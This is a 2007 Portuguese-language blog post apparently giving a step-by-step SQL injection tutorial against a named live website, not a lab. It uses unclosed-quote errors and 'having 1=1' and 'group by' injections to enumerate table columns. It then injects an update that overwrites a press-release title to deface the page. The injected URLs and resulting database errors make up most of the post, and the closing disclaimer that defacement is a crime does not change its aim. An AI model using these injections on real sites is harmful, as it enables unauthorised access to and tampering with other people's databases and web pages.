sexta-feira, 24 de agosto de 2007

.::Tutorial SQL Injection Unclosed Quotation::.

Sim, pelo nome parece difícil mas é bem fácil Primeiros, devemos achar uma URL vulnerável.
Fácil, digite: acidmud no google ahoahoaVou pegar a URL http://www.ihdg.com/press/release.asp?pid=56.

Agora, vá no seu browser e digite:

http://www.ihdg.com/press/release.asp?pid=56

Deverá aparecer:
Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark before the character string ''.

/press/release.asp, line 22

Isso quer dizer que tá vulnerável 8D
Agora vamos identificar umas dbs.

http://www.ihdg.com/press/release.asp?pid=56having 1=1

Apareceu isto:
Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 'tblPressRelease.ReleaseDate' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/press/release.asp, line 22

Já achamos uma, tblPressRelease.ReleaseDate =D
Agora faça:

http://www.ihdg.com/press/release.asp?pid=56group by tblPressRelease.ReleaseDate
E verás outra db

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 'tblPressRelease.Title' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/press/release.asp, line 22

Eita mãe, se você quiser ir achando outras columns, é so colocar uma , e depois a dbpor exemplo
http://www.ihdg.com/press/release.asp?pid=...ase.ReleaseDate, tblPressRelease.Title
e vai indo =D

Agora vamos mudar o conteúdo do tblPressRelease.Title.
faça o seguinte:

http://www.ihdg.com/press/release.asp?pid=....Title='seu conteudo aqui'
Faça isto e seja feliz xD

Lembre-se, deface é um crime virtual. Não me responsabilizo por seus atos!

Nenhum comentário:

 
Copyright 2007 - 2010 .::Mundo Digital::. - All Rights Reserved